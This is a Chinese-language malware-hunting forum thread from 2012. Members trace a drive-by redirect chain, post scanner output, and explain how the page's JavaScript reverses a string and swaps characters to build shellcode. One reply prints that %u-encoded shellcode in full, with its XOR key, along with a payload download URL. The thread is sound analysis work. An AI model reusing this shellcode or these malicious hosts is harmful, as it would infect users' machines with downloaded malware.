2012-12-9 毒网一枚【loading……Hunters get up!】

wjhstu-VxG

http://britishracingsystems.com/ngen/controlling/mydb.phpredirects tohttp://redpro.com.br/red/presto2.php

http://redpro.com.br/red/presto2.phpredirects tohttp://www.redpro.com.br/red/presto2.php

http://www.redpro.com.br/red/presto2.phpredirects tohttp://marketnewsnext6online.com/?33/11



Checking:http://marketnewsnext6online.com/js/main.js?33/11
File size:818 bytes
File MD5:a64102001b680f3e8703c7fd09b9b820

http://marketnewsnext6online.com/js/main.js?33/11 - archive JS-HTML
>http://marketnewsnext6online.com/js/main.js?33/11/JSFile_1[0][332] - Ok
http://marketnewsnext6online.com/js/main.js?33/11 - Ok



Checking:http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js
File size:91.25 KB
File MD5:0b6ecf17e30037994d3ffee51b525914

http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js - archive JS-HTML
>http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js/JSTag_1[1334c][39af] - Ok
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js - Ok



Checking:http://j.maxmind.com/app/geoip.js
File size:485 bytes
File MD5:7458b8cfe9308accffe45a1f4298a600

http://j.maxmind.com/app/geoip.js - archive JS-HTML
>http://j.maxmind.com/app/geoip.js/JSFile_1[0][1e5] - Ok
http://j.maxmind.com/app/geoip.js - Ok

Checking:http://marketnewsnext6online.com/?33/11
Engine version:7.0.4.9250
Total virus-finding records:3453535
File size:123.65 KB
File MD5:c803ff7bf9c762130dfab1db14fc7d88

http://marketnewsnext6online.com/?33/11 - archive JS-HTML
http://marketnewsnext6online.com/?33/11 - Ok

小仙仙

wjhstu-VxG 发表于 2012-12-10 18:57
see.giftsthatlove.info/r/l/updating-bugs_keeping.php

function getFillBytes(){var a='%'+'u'+'0c0c' ...

重点在: ["split"]("").reverse().join("");return a["replace"](/\!#/g,"%"+"u")};

即先将 "看似" 的 shellcode 逆转, 并根据正则表达式, "%u" 替换 "!#".

1. 不学 html, js, 仅看那些网上的 "教程" 永远也学不完 "解马".
2. 就算不学这些, 也可以对 reverse 这个单词, 还有 replace 部分等字眼保持高度的敏感, 有助于提供思路.
3. 真正理解 shellcode 的形式, 那个 "看似" 的 shellcode 开头没有 "#!" 反而末尾多了 "#!", 逆转后则为 "!#", 也能更快找到 reverse.

shellcode 如下, key = 28:

1. %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u54e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u4d5b%u064d%u414f%u5c4e%u5c5b%u4940%u445c%u5e47%u064d%u4641%u474e%u5a07%u4e07%u5806%u5840%u4317%u1e15%u2828

复制代码

1. http://see.giftsthatlove.info/r/f.php?k=6

复制代码

firefox3

小仙仙 发表于 2012-12-12 22:02
重点在: ["split"]("").reverse().join("");return a["replace"](/\!#/g,"%"+"u")};

即先将 "看似"  ...

厉害

wjhstu-VxG

小仙仙 发表于 2012-12-12 22:02
重点在: ["split"]("").reverse().join("");return a["replace"](/\!#/g,"%"+"u")};

即先将 "看似"  ...

感谢前辈解答！！

也知道问题出在代码上，只是不熟，也很难一眼看出啊……的确，很需要多学多练！

firefox3

wjhstu-VxG 发表于 2012-12-13 11:12
感谢前辈解答！！

也知道问题出在代码上，只是不熟，也很难一眼看出啊……的确，很需要多学多练！

我又发了几个，是不是该发工资了

sanhu35

小仙仙 发表于 2012-12-12 22:02
重点在: ["split"]("").reverse().join("");return a["replace"](/\!#/g,"%"+"u")};

即先将 "看似"  ...

MDecoder 0.67   不需要密钥。
decoder_2.129  需要密钥。

沉默x依旧

lz还在毒网中奋斗啊。。。